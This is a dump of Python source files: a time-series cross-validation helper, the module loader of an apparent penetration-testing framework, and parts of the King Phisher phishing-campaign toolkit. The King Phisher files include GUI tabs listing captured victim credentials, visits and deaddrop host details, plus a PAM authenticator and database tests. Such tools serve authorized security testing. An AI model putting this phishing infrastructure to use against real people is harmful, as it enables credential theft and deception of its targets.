metadata (dict) | text (string, length 60 to 3.49M)
---|---
{
"source": "0x0L/tscv",
"score": 3
} |
#### File: 0x0L/tscv/tscv.py
```python
import numpy as np
class Sequencer(object):
def __init__(self, n, lookback=1, lookforward=1, delay=0, step=1, squeeze=True):
"""Build sequence-liked features and targets indices for timeseries
Idx / Time 0.......................................................n
1 | lookback | delay | lookforward | |
2 | step | lookback | delay | lookforward | |
...
last | step | ... | step | lookback | delay | lookforward |
Parameters
----------
n : int
Length of the timeseries.
lookback : int (default is 1)
Features are sequences built by taking `lookback` values from the past.
lookforward : int (default is 1)
Targets are sequences built by taking `lookforward` values from the
future.
delay : int (default is 0)
Additional delay between features and targets.
delay can be negative but must be greater than -lookback.
step : int (default is 1)
Stepping size between samples. Must be strictly positive.
squeeze : boolean (default is True)
If true, squeezes single timestep features and targets.
Only has an effect if `lookback` or `lookforward` is equal to 1.
Usage
-----
>>> X = np.random.randn(2500, 1000, 3)
>>> y = X[:, :, 0]
>>> seq = Sequencer(len(y), lookback=5, lookforward=1)
>>> cv = seq.split(train_size=250, test_size=21)
>>> for train_test_split in cv:
X_train, X_test = seq.features(train_test_split, X)
y_train, y_test = seq.targets(train_test_split, y)
indices_train, indices_test = seq.indices(train_test_split)
"""
squeeze_ = np.squeeze if squeeze else lambda x: x
indices, features, targets = [], [], []
for i in range(lookback, n + 1 - delay - lookforward, step):
indices.append(i)
features.append(squeeze_(
np.arange(i - lookback, i)))
targets.append(squeeze_(
np.arange(i + delay, i + delay + lookforward)))
self.indices_ = np.array(indices)
self.features_, self.targets_ = np.array(features), np.array(targets)
def split(self, train_size, test_size):
"""Vanilla rolling-window cross validation generator
Parameters
----------
train_size : int
Size of the training set.
test_size : int
Size of the testing set.
"""
n = len(self.indices_)
for i in range(train_size, n, test_size):
train, test = np.arange(i - train_size, i), np.arange(i, min(i + test_size, n))
yield train, test
def features(self, split, features):
"""Return features slice for a test/train split."""
train, test = split
return features[self.features_[train]], features[self.features_[test]]
def targets(self, split, targets):
"""Return targets slice for a test/train split."""
train, test = split
return targets[self.targets_[train]], targets[self.targets_[test]]
def indices(self, split):
"""Return indices slice for a test/train split."""
train, test = split
return self.indices_[train], self.indices_[test]
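
# --- Illustrative usage (not part of the original module) ---
# A minimal rolling-window cross-validation run over a toy series; the
# shapes and window sizes below are assumptions chosen for the example.
if __name__ == '__main__':
    X = np.random.randn(300, 3)   # 300 timesteps, 3 channels
    y = X[:, 0]                   # predict the first channel
    seq = Sequencer(len(y), lookback=5, lookforward=1)
    for split in seq.split(train_size=100, test_size=20):
        X_train, X_test = seq.features(split, X)
        y_train, y_test = seq.targets(split, y)
        # -> (100, 5, 3) (20, 5, 3) (100,) (20,)
        # (the final test window may be shorter than test_size)
        print(X_train.shape, X_test.shape, y_train.shape, y_test.shape)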
``` |
{
"source": "0x0mar/Harness",
"score": 2
} |
#### File: harness/core/base.py
```python
import sys
import os
import json
import glob
from threading import Thread
from harness.core import framework
from harness.core import threads
from collections import OrderedDict
class Harness(framework.Framework):
def __init__(self):
framework.Framework.__init__(self)
self.intro = " __ __\n"
self.intro += " / / / /___ __________ ___ __________\n"
self.intro += " / /_/ / __ `/ ___/ __ \/ _ \/ ___/ ___/\n"
self.intro += " / __ / /_/ / / / / / / __(__ |__ )\n"
self.intro += "/_/ /_/\__,_/_/ /_/ /_/\___/____/____/\n"
self.intro += '\n\n\tProject Harness \n\tAuthor:\t<NAME>\n\tContact: rk5devmail[A T]gmail, @rgkelley5\n'
self.intro += '\nType help or ? to list commands. \n'
self.prompt = 'H> '
self.load_modules()
def load_modules(self):
self.print_debug("Loading modules....")
_module_names = []
for root, dirs, files in os.walk(self.main_mod_dir):
for _dir in dirs:
if not _dir.startswith("__"):
sys.path.append(os.path.realpath(os.path.join(root, _dir)))
for _file in files:
if _file.endswith(".py") and not _file.startswith("__"):
_module_names.append(_file.split(".")[0])
_modules = list(map(__import__, _module_names))
for mod in _modules:
mod_path = mod.__file__.split("modules")
if len(mod_path) > 1:
_mod_name = mod_path[1][1:].split(".")[0] # Get the module name --> path/module
self.modules[_mod_name] = mod
self.add_completion('load', _mod_name)
self.modules = OrderedDict(sorted(self.modules.items(), key=lambda t:t[0]))
def do_load(self, args=None):
# args = module name for now
name = args
if name in self.modules:
mod = self.modules[name].Module()
result, _globals = mod.go(self.framework_globals)
self.framework_globals = _globals
if isinstance(result, threads.ModuleThread):
self.print_debug("Starting background job...")
self._add_job(name, result)
result.start()
else:
self.print_error("Unknown module specified")
def show_options(self, args=None):
super().show_globals()
print()
super().show_options()
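
# --- Illustrative sketch (not part of the original file) ---
# The minimal shape of a module that load_modules()/do_load() above can
# drive: each discovered file exposes a `Module` class whose go() takes
# the framework globals and returns a (result, globals) pair. Returning
# a threads.ModuleThread instead of None asks the framework to run the
# module as a background job. The body here is a placeholder.
class Module(object):
    def go(self, framework_globals):
        result = None  # or a threads.ModuleThread subclass instance
        return result, framework_globals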
``` |
{
"source": "0x0mar/king-phisher",
"score": 2
} |
#### File: client/dialogs/campaign_selection.py
```python
from king_phisher import utilities
from king_phisher.client import gui_utilities
from gi.repository import Gdk
from gi.repository import Gtk
__all__ = ['KingPhisherClientCampaignSelectionDialog']
class KingPhisherClientCampaignSelectionDialog(gui_utilities.UtilityGladeGObject):
"""
Display a dialog which allows a new campaign to be created or an
existing campaign to be opened.
"""
gobject_ids = [
'button_new_campaign',
'entry_new_campaign_name',
'treeview_campaigns'
]
top_gobject = 'dialog'
def __init__(self, *args, **kwargs):
super(KingPhisherClientCampaignSelectionDialog, self).__init__(*args, **kwargs)
treeview = self.gobjects['treeview_campaigns']
columns = ['Campaign Name', 'Created By', 'Creation Date']
for column_id in range(len(columns)):
column_name = columns[column_id]
column_id += 1
column = Gtk.TreeViewColumn(column_name, Gtk.CellRendererText(), text=column_id)
column.set_sort_column_id(column_id)
treeview.append_column(column)
treeview.get_selection().set_mode(Gtk.SelectionMode.SINGLE)
self.load_campaigns()
def _highlight_campaign(self, campaign_name):
treeview = self.gobjects['treeview_campaigns']
store = treeview.get_model()
store_iter = store.get_iter_first()
while store_iter:
if store.get_value(store_iter, 1) == campaign_name:
treeview.set_cursor(store.get_path(store_iter), None, False)
return True
store_iter = store.iter_next(store_iter)
return False
def load_campaigns(self):
"""Load campaigns from the remote server and populate the :py:class:`Gtk.TreeView`."""
treeview = self.gobjects['treeview_campaigns']
store = treeview.get_model()
if store is None:
store = Gtk.ListStore(str, str, str, str)
treeview.set_model(store)
else:
store.clear()
for campaign in self.parent.rpc.remote_table('campaigns'):
created_ts = campaign['created']
created_ts = utilities.datetime_utc_to_local(created_ts)
created_ts = utilities.format_datetime(created_ts)
store.append([str(campaign['id']), campaign['name'], campaign['user_id'], created_ts])
def signal_button_clicked(self, button):
campaign_name_entry = self.gobjects['entry_new_campaign_name']
campaign_name = campaign_name_entry.get_property('text')
if not campaign_name:
gui_utilities.show_dialog_warning('Invalid Campaign Name', self.dialog, 'Please specify a new campaign name')
return
try:
self.parent.rpc('campaign/new', campaign_name)
except Exception:
gui_utilities.show_dialog_error('Failed To Create New Campaign', self.dialog, 'Encountered an error creating the new campaign')
return
campaign_name_entry.set_property('text', '')
self.load_campaigns()
self._highlight_campaign(campaign_name)
def signal_entry_new_campaign_name_activate(self, entry):
self.gobjects['button_new_campaign'].emit('clicked')
def signal_treeview_key_pressed(self, widget, event):
if event.type != Gdk.EventType.KEY_PRESS:
return
treeview = self.gobjects['treeview_campaigns']
keyval = event.get_keyval()[1]
if event.get_state() == Gdk.ModifierType.CONTROL_MASK:
if keyval == Gdk.KEY_c:
gui_utilities.gtk_treeview_selection_to_clipboard(treeview)
elif keyval == Gdk.KEY_F5:
self.load_campaigns()
self._highlight_campaign(self.config.get('campaign_name'))
elif keyval == Gdk.KEY_Delete:
treeview_selection = treeview.get_selection()
(model, tree_iter) = treeview_selection.get_selected()
if not tree_iter:
return
campaign_id = model.get_value(tree_iter, 0)
if self.config.get('campaign_id') == campaign_id:
gui_utilities.show_dialog_warning('Can Not Delete Campaign', self.dialog, 'Can not delete the current campaign.')
return
if not gui_utilities.show_dialog_yes_no('Delete This Campaign?', self.dialog, 'This action is irreversible, all campaign data will be lost.'):
return
self.parent.rpc('campaign/delete', campaign_id)
self.load_campaigns()
self._highlight_campaign(self.config.get('campaign_name'))
def interact(self):
self._highlight_campaign(self.config.get('campaign_name'))
self.dialog.show_all()
response = self.dialog.run()
old_campaign_id = self.config.get('campaign_id')
old_campaign_name = self.config.get('campaign_name')
while response != Gtk.ResponseType.CANCEL:
treeview = self.gobjects['treeview_campaigns']
selection = treeview.get_selection()
(model, tree_iter) = selection.get_selected()
if tree_iter:
break
gui_utilities.show_dialog_error('No Campaign Selected', self.dialog, 'Either select a campaign or create a new one.')
response = self.dialog.run()
if response != Gtk.ResponseType.CANCEL:
campaign_id = model.get_value(tree_iter, 0)
self.config['campaign_id'] = campaign_id
campaign_name = model.get_value(tree_iter, 1)
self.config['campaign_name'] = campaign_name
if not (campaign_id == old_campaign_id and campaign_name == old_campaign_name):
self.parent.emit('campaign-set', campaign_id)
self.dialog.destroy()
return response
```
#### File: client/tabs/campaign.py
```python
import datetime
import logging
import threading
import time
from king_phisher import utilities
from king_phisher.client import export
from king_phisher.client import graphs
from king_phisher.client import gui_utilities
from gi.repository import Gdk
from gi.repository import GLib
from gi.repository import Gtk
class CampaignViewGenericTab(gui_utilities.UtilityGladeGObject):
"""
This object is meant to be subclassed by all of the tabs which load and
display information about the current campaign.
"""
label_text = 'Unknown'
"""The label of the tab for display in the GUI."""
top_gobject = 'box'
def __init__(self, *args, **kwargs):
self.label = Gtk.Label(label=self.label_text)
"""The :py:class:`Gtk.Label` representing this tab with text from :py:attr:`~.CampaignViewGenericTab.label_text`."""
super(CampaignViewGenericTab, self).__init__(*args, **kwargs)
self.is_destroyed = threading.Event()
getattr(self, self.top_gobject).connect('destroy', self.signal_destroy)
self.last_load_time = float('-inf')
"""The last time the data was loaded from the server."""
self.refresh_frequency = utilities.timedef_to_seconds(str(self.config.get('gui.refresh_frequency', '5m')))
"""The lifetime in seconds to wait before refreshing the data from the server."""
self.loader_thread = None
"""The thread object which loads the data from the server."""
self.loader_thread_lock = threading.Lock()
"""The :py:class:`threading.Lock` object used for synchronization between the loader and main threads."""
def load_campaign_information(self, force=False):
raise NotImplementedError()
def signal_button_clicked_refresh(self, button):
self.load_campaign_information(force=True)
def signal_destroy(self, gobject):
self.is_destroyed.set()
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
self.logger.debug("waiting on thread: {0}.loader_thread (tid: 0x{1:x})".format(self.__class__.__name__, self.loader_thread.ident))
while self.loader_thread.is_alive():
gui_utilities.gtk_sync()
self.logger.debug("joined thread: {0}.loader_thread (tid: 0x{1:x})".format(self.__class__.__name__, self.loader_thread.ident))
class CampaignViewGenericTableTab(CampaignViewGenericTab):
"""
This object is meant to be subclassed by tabs which will display
campaign information of different types from specific database
tables. The data in this object is refreshed when multiple events
occur and it uses an internal timer to represent the last time the
data was refreshed.
"""
gobject_ids = [
'button_refresh',
'treeview_campaign'
]
remote_table_name = ''
"""The database table represented by this tab."""
view_columns = {}
"""The dictionary map of column numbers to column names starting at column 1."""
def __init__(self, *args, **kwargs):
super(CampaignViewGenericTableTab, self).__init__(*args, **kwargs)
treeview = self.gobjects['treeview_campaign']
treeview.get_selection().set_mode(Gtk.SelectionMode.MULTIPLE)
popup_copy_submenu = Gtk.Menu.new()
self.view_column_renderers = {}
columns = self.view_columns
for column_id in range(1, len(columns) + 1):
column_name = columns[column_id]
column = Gtk.TreeViewColumn(column_name, Gtk.CellRendererText(), text=column_id)
column.set_sort_column_id(column_id)
treeview.append_column(column)
self.view_column_renderers[column_id] = column
menu_item = Gtk.MenuItem.new_with_label(column_name)
menu_item.connect('activate', self.signal_activate_popup_menu_copy, column_id)
popup_copy_submenu.append(menu_item)
self.popup_menu = Gtk.Menu.new()
"""The :py:class:`Gtk.Menu` object which is displayed when right-clicking in the view area."""
menu_item = Gtk.MenuItem.new_with_label('Copy')
menu_item.set_submenu(popup_copy_submenu)
self.popup_menu.append(menu_item)
menu_item = Gtk.SeparatorMenuItem()
self.popup_menu.append(menu_item)
menu_item = Gtk.MenuItem.new_with_label('Delete')
menu_item.connect('activate', lambda _: self._prompt_to_delete_row())
self.popup_menu.append(menu_item)
self.popup_menu.show_all()
def _prompt_to_delete_row(self):
selection = self.gobjects['treeview_campaign'].get_selection()
if not selection.count_selected_rows():
return
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
gui_utilities.show_dialog_warning('Can Not Delete Rows While Loading', self.parent)
return
(model, tree_paths) = selection.get_selected_rows()
if not tree_paths:
return
tree_iters = map(model.get_iter, tree_paths)
# materialize so len() below works and values survive Python 3's lazy map
row_ids = list(map(lambda ti: model.get_value(ti, 0), tree_iters))
if len(row_ids) == 1:
message = 'Delete This Row?'
else:
message = "Delete These {0:,} Rows?".format(len(row_ids))
if not gui_utilities.show_dialog_yes_no(message, self.parent, 'This information will be lost.'):
return
for row_id in row_ids:
self.parent.rpc(self.remote_table_name + '/delete', row_id)
self.load_campaign_information(force=True)
def format_row_data(self, row):
"""
This method is overridden by subclasses to format the raw row
data returned from the server. The length of the list must equal
the number of columns in the table. This method is called for
each row in the remote table by the loader thread.
:return: The formatted row data.
:rtype: list
"""
raise NotImplementedError()
def format_cell_data(self, cell_data):
"""
This method provides formatting to the individual cell values returned
from the :py:meth:`.format_row_data` function. Values are converted into
a format suitable for reading.
:param cell_data: The value to format.
:return: The formatted cell value.
:rtype: str
"""
if isinstance(cell_data, datetime.datetime):
cell_data = utilities.datetime_utc_to_local(cell_data)
return utilities.format_datetime(cell_data)
elif cell_data is None:
return ''
return str(cell_data)
def load_campaign_information(self, force=False):
"""
Load the necessary campaign information from the remote server.
Unless *force* is True, the
:py:attr:`~.CampaignViewGenericTab.last_load_time` is compared
with the :py:attr:`~.CampaignViewGenericTab.refresh_frequency` to
check if the information is stale. If the local data is not stale,
this function will return without updating the table.
:param bool force: Ignore the load life time and force loading the remote data.
"""
if not force and ((time.time() - self.last_load_time) < self.refresh_frequency):
return
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
return
self.loader_thread_lock.acquire()
treeview = self.gobjects['treeview_campaign']
store = treeview.get_model()
if store == None:
store_columns = [str]
# one str column per view column; the original used map() purely for its
# side effect, which silently does nothing under Python 3's lazy map
store_columns.extend(str for _ in self.view_columns)
store = Gtk.ListStore(*store_columns)
treeview.set_model(store)
else:
store.clear()
self.loader_thread = threading.Thread(target=self.loader_thread_routine, args=(store,))
self.loader_thread.daemon = True
self.loader_thread.start()
self.loader_thread_lock.release()
return
def loader_thread_routine(self, store):
"""
The loading routine to be executed within a thread.
:param store: The store object to place the new data.
:type store: :py:class:`Gtk.ListStore`
"""
gui_utilities.glib_idle_add_wait(lambda: self.gobjects['treeview_campaign'].set_property('sensitive', False))
for row_data in self.parent.rpc.remote_table('campaign/' + self.remote_table_name, self.config['campaign_id']):
if self.is_destroyed.is_set():
break
row_id = row_data['id']
row_data = self.format_row_data(row_data)
if row_data is None:
self.parent.rpc(self.remote_table_name + '/delete', row_id)
continue
row_data = list(map(self.format_cell_data, row_data))
row_data.insert(0, str(row_id))
gui_utilities.glib_idle_add_wait(store.append, row_data)
if self.is_destroyed.is_set():
return
gui_utilities.glib_idle_add_wait(lambda: self.gobjects['treeview_campaign'].set_property('sensitive', True))
self.last_load_time = time.time()
def signal_button_clicked_export(self, button):
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
gui_utilities.show_dialog_warning('Can Not Export Rows While Loading', self.parent)
return
dialog = gui_utilities.UtilityFileChooser('Export Data', self.parent)
file_name = self.config['campaign_name'] + '.csv'
response = dialog.run_quick_save(file_name)
dialog.destroy()
if not response:
return
destination_file = response['target_path']
export.treeview_liststore_to_csv(self.gobjects['treeview_campaign'], destination_file)
def signal_treeview_button_pressed(self, widget, event):
if not (event.type == Gdk.EventType.BUTTON_PRESS and event.button == 3):
return
selection = self.gobjects['treeview_campaign'].get_selection()
if not selection.count_selected_rows():
return
pos_func = lambda m, d: (event.get_root_coords()[0], event.get_root_coords()[1], True)
self.popup_menu.popup(None, None, pos_func, None, event.button, event.time)
return True
def signal_treeview_key_pressed(self, widget, event):
if event.type != Gdk.EventType.KEY_PRESS:
return
treeview = self.gobjects['treeview_campaign']
keyval = event.get_keyval()[1]
if event.get_state() == Gdk.ModifierType.CONTROL_MASK:
if keyval == Gdk.KEY_c:
gui_utilities.gtk_treeview_selection_to_clipboard(treeview)
elif keyval == Gdk.KEY_F5:
self.load_campaign_information(force=True)
elif keyval == Gdk.KEY_Delete:
self._prompt_to_delete_row()
def signal_activate_popup_menu_copy(self, widget, column_id):
treeview = self.gobjects['treeview_campaign']
gui_utilities.gtk_treeview_selection_to_clipboard(treeview, column_id)
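
# --- Illustrative sketch (not part of the original file) ---
# The threading pattern the table tabs above rely on, reduced to plain
# GLib calls: a worker thread computes rows off the main loop and
# marshals every GTK mutation back onto it, because GTK objects may only
# be touched from the main thread. fetch_rows is a hypothetical stand-in
# for the RPC iteration used in loader_thread_routine().
def _example_loader(store, fetch_rows):
    def append_row(row):
        store.append(row)
        return False  # run once, then remove the idle callback
    for row in fetch_rows():
        GLib.idle_add(append_row, row)
# threading.Thread(target=_example_loader, args=(store, fetch_rows)).start()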
class CampaignViewDeaddropTab(CampaignViewGenericTableTab):
"""Display campaign information regarding dead drop connections."""
remote_table_name = 'deaddrop_connections'
label_text = 'Deaddrop'
view_columns = {
1: 'Destination',
2: 'Visit Count',
3: 'External IP',
4: 'Username',
5: 'Hostname',
6: 'Local IP Addresses',
7: 'First Hit',
8: 'Last Hit'
}
def format_row_data(self, connection):
deploy_id = connection['deployment_id']
deploy_details = self.parent.rpc.remote_table_row('deaddrop_deployments', deploy_id, cache=True)
if not deploy_details:
return None
row = (
deploy_details['destination'],
connection['visit_count'],
connection['visitor_ip'],
connection['local_username'],
connection['local_hostname'],
connection['local_ip_addresses'],
connection['first_visit'],
connection['last_visit']
)
return row
class CampaignViewCredentialsTab(CampaignViewGenericTableTab):
"""Display campaign information regarding submitted credentials."""
remote_table_name = 'credentials'
label_text = 'Credentials'
view_columns = {
1: 'Email',
2: 'Username',
3: 'Password',
4: 'Submitted'
}
def __init__(self, *args, **kwargs):
super(CampaignViewCredentialsTab, self).__init__(*args, **kwargs)
self.view_column_renderers[3].set_property('visible', False)
def format_row_data(self, credential):
msg_id = credential['message_id']
msg_details = self.parent.rpc.remote_table_row('messages', msg_id, cache=True)
if not msg_details:
return None
row = (
msg_details['target_email'],
credential['username'],
credential['password'],
credential['submitted']
)
return row
def signal_button_toggled_show_passwords(self, button):
self.view_column_renderers[3].set_property('visible', button.get_property('active'))
class CampaignViewDashboardTab(CampaignViewGenericTab):
"""Display campaign information on a graphical dash board."""
gobject_ids = [
'box_top_left',
'box_top_right',
'box_bottom',
'scrolledwindow_top_left',
'scrolledwindow_top_right',
'scrolledwindow_bottom'
]
label_text = 'Dashboard'
"""The tabs label for display in the GUI."""
def __init__(self, *args, **kwargs):
super(CampaignViewDashboardTab, self).__init__(*args, **kwargs)
self.graphs = []
"""The :py:class:`.CampaignGraph` classes represented on the dash board."""
# Position: (DefaultGraphName, Size)
dash_ports = {
'top_left': (380, 200),
'top_right': (380, 200),
'bottom': None
}
for dash_port, details in dash_ports.items():
graph_name = self.config['dashboard.' + dash_port]
Klass = graphs.get_graph(graph_name)
if not Klass:
self.logger.warning('could not get graph: ' + graph_name)
continue
graph_inst = Klass(self.config, self.parent, details)
self.gobjects['scrolledwindow_' + dash_port].add_with_viewport(graph_inst.canvas)
self.gobjects['box_' + dash_port].pack_end(graph_inst.navigation_toolbar, False, False, 0)
self.graphs.append(graph_inst)
self.logger.debug("dashboard refresh frequency set to {0} seconds".format(self.refresh_frequency))
GLib.timeout_add_seconds(self.refresh_frequency, self.loader_idle_routine)
def load_campaign_information(self, force=False):
"""
Load the necessary campaign information from the remote server.
Unless *force* is True, the
:py:attr:`~.CampaignViewDashboardTab.last_load_time` is compared
with the :py:attr:`~.CampaignViewDashboardTab.refresh_frequency` to
check if the information is stale. If the local data is not
stale, this function will return without updating the table.
:param bool force: Ignore the load life time and force loading the remote data.
"""
if not force and ((time.time() - self.last_load_time) < self.refresh_frequency):
return
if not hasattr(self.parent, 'rpc'):
self.logger.warning('skipping load_campaign_information because rpc is not initialized')
return
with self.loader_thread_lock:
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
return
self.loader_thread = threading.Thread(target=self.loader_thread_routine)
self.loader_thread.daemon = True
self.loader_thread.start()
def loader_idle_routine(self):
"""The routine which refreshes the campaign data at a regular interval."""
self.logger.debug('idle loader routine called')
self.load_campaign_information(force=True)
return True
def loader_thread_routine(self):
"""The loading routine to be executed within a thread."""
info_cache = {}
for graph in self.graphs:
if self.is_destroyed.is_set():
break
info_cache = gui_utilities.glib_idle_add_wait(lambda: graph.refresh(info_cache, self.is_destroyed))
self.last_load_time = time.time()
class CampaignViewVisitsTab(CampaignViewGenericTableTab):
"""Display campaign information regarding incoming visitors."""
remote_table_name = 'visits'
label_text = 'Visits'
view_columns = {
1: 'Email',
2: 'Visitor IP',
3: 'Visitor Details',
4: 'Visit Count',
5: 'First Visit',
6: 'Last Visit'
}
def format_row_data(self, visit):
msg_id = visit['message_id']
msg_details = self.parent.rpc.remote_table_row('messages', msg_id, cache=True)
if not msg_details:
return None
row = (
msg_details['target_email'],
visit['visitor_ip'],
visit['visitor_details'],
visit['visit_count'],
visit['first_visit'],
visit['last_visit']
)
return row
class CampaignViewMessagesTab(CampaignViewGenericTableTab):
"""Display campaign information regarding sent messages."""
remote_table_name = 'messages'
label_text = 'Messages'
view_columns = {
1: 'Email',
2: 'Sent',
3: 'Opened',
4: 'Trained'
}
def format_row_data(self, message):
row = (
message['target_email'],
message['sent'],
message['opened'],
('Yes' if message['trained'] else '')
)
return row
class CampaignViewTab(object):
"""
The King Phisher client top-level 'View Campaign' tab. This object
manages the sub-tabs which display all the information regarding
the current campaign.
"""
def __init__(self, config, parent):
"""
:param dict config: The King Phisher client configuration.
:param parent: The parent window for this object.
:type parent: :py:class:`Gtk.Window`
"""
self.config = config
self.parent = parent
self.logger = logging.getLogger('KingPhisher.Client.' + self.__class__.__name__)
self.box = Gtk.Box()
self.box.set_property('orientation', Gtk.Orientation.VERTICAL)
self.box.show()
self.label = Gtk.Label(label='View Campaign')
"""The :py:class:`Gtk.Label` representing this tabs name."""
self.notebook = Gtk.Notebook()
""" The :py:class:`Gtk.Notebook` for holding sub-tabs."""
self.notebook.connect('switch-page', self.signal_notebook_switch_page)
self.notebook.set_scrollable(True)
self.box.pack_start(self.notebook, True, True, 0)
self.tabs = {}
"""A dict object holding the sub tabs managed by this object."""
current_page = self.notebook.get_current_page()
self.last_page_id = current_page
if graphs.has_matplotlib:
self.logger.info('matplotlib is installed, dashboard will be available')
dashboard_tab = CampaignViewDashboardTab(self.config, self.parent)
self.tabs['dashboard'] = dashboard_tab
self.notebook.append_page(dashboard_tab.box, dashboard_tab.label)
else:
self.logger.warning('matplotlib is not installed, dashboard will not be available')
messages_tab = CampaignViewMessagesTab(self.config, self.parent)
self.tabs['messages'] = messages_tab
self.notebook.append_page(messages_tab.box, messages_tab.label)
visits_tab = CampaignViewVisitsTab(self.config, self.parent)
self.tabs['visits'] = visits_tab
self.notebook.append_page(visits_tab.box, visits_tab.label)
credentials_tab = CampaignViewCredentialsTab(self.config, self.parent)
self.tabs['credentials'] = credentials_tab
self.notebook.append_page(credentials_tab.box, credentials_tab.label)
deaddrop_connections_tab = CampaignViewDeaddropTab(self.config, self.parent)
self.tabs['deaddrop_connections'] = deaddrop_connections_tab
self.notebook.append_page(deaddrop_connections_tab.box, deaddrop_connections_tab.label)
for tab in self.tabs.values():
tab.box.show()
self.notebook.show()
self.parent.connect('campaign-set', self.signal_kpc_campaign_set)
def signal_kpc_campaign_set(self, kpc, cid):
for tab_name, tab in self.tabs.items():
if hasattr(tab, 'load_campaign_information'):
tab.load_campaign_information(force=True)
def signal_notebook_switch_page(self, notebook, current_page, index):
if not hasattr(self.parent, 'rpc'):
return
#previous_page = notebook.get_nth_page(self.last_page_id)
self.last_page_id = index
for tab_name, tab in self.tabs.items():
if current_page != tab.box:
continue
if hasattr(tab, 'load_campaign_information'):
tab.load_campaign_information()
```
#### File: king_phisher/server/authenticator.py
```python
import hashlib
import json
import os
import random
import string
import time
from king_phisher.third_party import pam
__all__ = ['ForkedAuthenticator']
make_salt = lambda: ''.join(random.choice(string.ascii_letters + string.digits + string.punctuation) for x in range(random.randint(5, 8)))
make_hash = lambda pw: hashlib.sha512(pw.encode('utf-8')).digest()
class ForkedAuthenticator(object):
"""
This provides authentication services to the King Phisher server
through PAM. It is initialized while the server is running as root
and forks into the background before the privileges are dropped. It
continues to run as root and forwards requests through a pipe to PAM.
The pipes use JSON to encode the request data as a string before
sending it, with a newline character as the terminator.
"""
def __init__(self, cache_timeout=600):
"""
:param int cache_timeout: The life time of cached credentials in seconds.
"""
self.cache_timeout = cache_timeout
"""The timeout of the credential cache in seconds."""
self.parent_rfile, self.child_wfile = os.pipe()
self.child_rfile, self.parent_wfile = os.pipe()
self.child_pid = os.fork()
"""The PID of the forked child."""
if not self.child_pid:
self.rfile = self.child_rfile
self.wfile = self.child_wfile
else:
self.rfile = self.parent_rfile
self.wfile = self.parent_wfile
self.rfile = os.fdopen(self.rfile, 'r', 1)
self.wfile = os.fdopen(self.wfile, 'w', 1)
if not self.child_pid:
self.child_routine()
self.rfile.close()
self.wfile.close()
os._exit(os.EX_OK)
self.cache_salt = make_salt()
"""The salt to be prepended to passwords before hashing them for the cache."""
self.cache = {}
"""The credential cache dictionary. Keys are usernames and values are tuples of password hashes and ages."""
return
def send(self, request):
"""
Encode and send a request through the pipe to the opposite end.
:param dict request: A request.
"""
self.wfile.write(json.dumps(request) + '\n')
def recv(self):
"""
Receive a request and decode it.
:return: The decoded request.
:rtype: dict
"""
try:
request = self.rfile.readline()[:-1]
return json.loads(request)
except KeyboardInterrupt:
return {}
def child_routine(self):
"""
The main routine that is executed by the child after the object
forks. This loop does not exit unless a stop request is made.
"""
service = 'login'
if os.path.isfile('/etc/pam.d/sshd'):
service = 'sshd'
while True:
request = self.recv()
if 'action' not in request:
continue
action = request['action']
if action == 'stop':
break
elif action != 'authenticate':
continue
username = str(request['username'])
password = str(request['password'])
result = {}
result['result'] = pam.authenticate(username, password, service=service)
self.send(result)
def authenticate(self, username, password):
"""
Check if a uername and password are valid. If they are, the
password will be salted, hashed with SHA-512 and stored so the
next call with the same values will not require sending a
request to the forked child.
:param str username: The username to check.
:param str password: The password to check.
:return: Whether the credentials are valid or not.
:rtype: bool
"""
pw_hash = make_hash(self.cache_salt + password)
cached_hash, timeout = self.cache.get(username, (None, 0))
if timeout < time.time():
request = {}
request['action'] = 'authenticate'
request['username'] = username
request['password'] = password
self.send(request)
result = self.recv()
if result['result']:
self.cache[username] = (pw_hash, time.time() + self.cache_timeout)
return result['result']
return (cached_hash == pw_hash)
def stop(self):
"""
Send a stop request to the child process and wait for it to exit.
"""
if not os.path.exists("/proc/{0}".format(self.child_pid)):
return
request = {}
request['action'] = 'stop'
self.send(request)
os.waitpid(self.child_pid, 0)
self.rfile.close()
self.wfile.close()
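
# --- Illustrative sketch (not part of the original file) ---
# The newline-terminated JSON protocol used by send()/recv() above, in
# isolation and without the fork plumbing.
if __name__ == '__main__':
    rfd, wfd = os.pipe()
    rfile, wfile = os.fdopen(rfd, 'r', 1), os.fdopen(wfd, 'w', 1)
    wfile.write(json.dumps({'action': 'authenticate', 'username': 'alice'}) + '\n')
    print(json.loads(rfile.readline()[:-1]))  # {'action': 'authenticate', ...}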
```
#### File: tests/server/database.py
```python
import unittest
from king_phisher import testing
from king_phisher.server.database import manager as db_manager
from king_phisher.server.database import models as db_models
from king_phisher.utilities import random_string
get_tables_with_column_id = db_models.get_tables_with_column_id
class ServerDatabaseTests(testing.KingPhisherTestCase):
def test_create_database(self):
try:
db_manager.init_database('sqlite://')
except Exception as error:
self.fail("failed to initialize the database (error: {0})".format(error.__class__.__name__))
def test_get_meta_data(self):
try:
db_manager.init_database('sqlite://')
except Exception as error:
self.fail("failed to initialize the database (error: {0})".format(error.__class__.__name__))
database_driver = db_manager.get_meta_data('database_driver')
self.assertEqual(database_driver, 'sqlite')
schema_version = db_manager.get_meta_data('schema_version')
self.assertEqual(schema_version, db_models.SCHEMA_VERSION)
def test_get_tables_id(self):
tables = set([
'alert_subscriptions',
'campaigns',
'credentials',
'deaddrop_connections',
'deaddrop_deployments',
'landing_pages',
'messages',
'meta_data',
'users',
'visits'
])
tables_with_id = get_tables_with_column_id('id')
self.assertSetEqual(set(tables_with_id), tables)
def test_get_tables_campaign_id(self):
tables = set([
'alert_subscriptions',
'credentials',
'deaddrop_connections',
'deaddrop_deployments',
'landing_pages',
'messages',
'visits'
])
self.assertSetEqual(set(get_tables_with_column_id('campaign_id')), tables)
def test_get_tables_message_id(self):
tables = set([
'credentials',
'visits'
])
self.assertSetEqual(set(get_tables_with_column_id('message_id')), tables)
def test_set_meta_data(self):
try:
db_manager.init_database('sqlite://')
except Exception as error:
self.fail("failed to initialize the database (error: {0})".format(error.__class__.__name__))
# set a new value
key = random_string(10)
value = random_string(20)
db_manager.set_meta_data(key, value)
self.assertEqual(db_manager.get_meta_data(key), value)
# update an existing value
value = random_string(30)
db_manager.set_meta_data(key, value)
self.assertEqual(db_manager.get_meta_data(key), value)
if __name__ == '__main__':
unittest.main()
```
#### File: king-phisher/tools/database_console.py
```python
import argparse
import code
import logging
import os
